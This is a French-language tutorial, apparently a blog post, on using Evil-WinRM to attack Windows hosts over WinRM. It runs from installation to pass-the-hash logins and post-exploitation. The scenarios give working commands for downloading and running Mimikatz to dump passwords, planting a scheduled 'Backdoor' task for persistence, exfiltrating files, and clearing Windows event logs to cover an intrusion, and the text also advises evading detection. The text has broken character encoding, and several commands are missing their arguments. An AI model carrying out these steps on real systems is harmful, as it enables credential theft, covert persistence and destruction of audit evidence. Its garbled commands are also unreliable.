đ„ Evil-WinRM - Guide Complet et Fonctionnel
Evil-WinRM est un outil dĂ©diĂ© aux pentesters et Ă©quipes Red Team pour exploiter Windows Remote Management (WinRM). Ce tutoriel couvre lâinstallation, lâexploitation, et des scĂ©narios pratiques pour maximiser vos campagnes de post-exploitation. đ
1ïžâŁ PrĂ©-requis
- Une machine dâattaque sous Linux (Kali, Parrot OS, ou Ă©quivalente).
- Ruby installĂ© sur la machine dâattaque.
- AccÚs à une cible Windows avec WinRM activé.
- Identifiants valides sur la cible (username et password ou hash).
- Permissions pour effectuer des tests autorisés.
2ïžâŁ Installation d'Evil-WinRM
Ătape 1 : TĂ©lĂ©charger Evil-WinRM
Clonez le dépÎt GitHub officiel :
git clone https://github.com/Hackplayers/evil-winrm.git
Accédez au répertoire :
cd evil-winrm
Ătape 2 : Installer les DĂ©pendances
Installez Ruby et les bibliothÚques nécessaires :
sudo apt update
sudo apt install ruby -y
gem install bundler
bundle install
Ătape 3 : VĂ©rifier lâInstallation
Testez lâoutil pour confirmer quâil fonctionne :
ruby evil-winrm.rb --help
Vous devriez voir une liste des options disponibles.
3ïžâŁ Configuration et PrĂ©paration
Vérification des Ports WinRM
Par défaut, WinRM utilise les ports suivants :
- 5985 : Connexions HTTP non sécurisées.
- 5986 : Connexions HTTPS sécurisées.
Vérifiez si ces ports sont ouverts sur la cible :
nmap -p 5985,5986
WinRM Activé sur la Cible
Confirmez que WinRM est activé avec les commandes suivantes sur la cible (si vous y avez accÚs) :
winrm quickconfig
Get-Service -Name WinRM
Le service doit ĂȘtre en Ă©tat "Running".
4ïžâŁ Utilisation d'Evil-WinRM
Connexion Basique
Utilisez Evil-WinRM pour vous connecter Ă une cible avec des identifiants valides :
ruby evil-winrm.rb -i -u -p
Connexion avec Hash
Si vous disposez dâun NTLM hash, utilisez lâoption suivante :
ruby evil-winrm.rb -i -u -H
Options Supplémentaires
Evil-WinRM propose plusieurs options pour personnaliser la connexion :
-S: Forcer une connexion HTTPS.-P: Spécifier un port personnalisé.-e: Charger un script ou un fichier sur la cible.
5ïžâŁ Commandes Post-Exploitation
Exécuter des Commandes
Depuis une session Evil-WinRM, vous pouvez exécuter des commandes PowerShell :
whoami
Get-Process
Get-NetIPAddress
Transfert de Fichiers
Chargez ou téléchargez des fichiers entre votre machine et la cible :
upload /path/to/file C:\Destination: Envoyer un fichier.download C:\Source\file /path/to/save: Télécharger un fichier.
Exécution de Scripts
Chargez et exécutez un script PowerShell local sur la cible :
ruby evil-winrm.rb -i -u -p -e script.ps1
6ïžâŁ ScĂ©narios Pratiques
Scénario 1 : Enumeration Basique
Listez les utilisateurs et groupes locaux sur la cible :
Get-LocalUser
Get-LocalGroupMember -Group Administrators
Scénario 2 : Dump de Mots de Passe
Utilisez Mimikatz pour extraire les mots de passe en mémoire :
Invoke-WebRequest -Uri -OutFile C:\temp\mimikatz.exe
C:\temp\mimikatz.exe
Scénario 3 : Persistance
Ajoutez une tùche planifiée pour exécuter un script malveillant :
schtasks /create /sc daily /tn "Backdoor" /tr "C:\backdoor.ps1" /st 09:00
Scénario 4 : Exfiltration des Données
TransfĂ©rez des fichiers sensibles vers une machine dâattaque :
download C:\sensitive_data\*.txt /path/to/local/machine
Scénario 5 : Suppression des Logs
Effacez les traces de votre intrusion :
wevtutil cl Security
wevtutil cl Application
wevtutil cl System
7ïžâŁ IntĂ©gration et Automatisation
Automatisation des TĂąches
Utilisez des scripts Bash pour exécuter Evil-WinRM avec plusieurs cibles :
#!/bin/bash
for ip in $(cat targets.txt); do
ruby evil-winrm.rb -i $ip -u admin -p password
done
8ïžâŁ Conseils et Bonnes Pratiques
- Utilisez uniquement dans des environnements autorisés.
- Documentez toutes les actions pour respecter lâĂ©thique.
- Surveillez les journaux Windows (Event Viewer) pour éviter la détection.
- Ăvitez dâutiliser des commandes invasives lorsque ce nâest pas nĂ©cessaire.
- Formez-vous réguliÚrement sur les nouvelles méthodes de post-exploitation.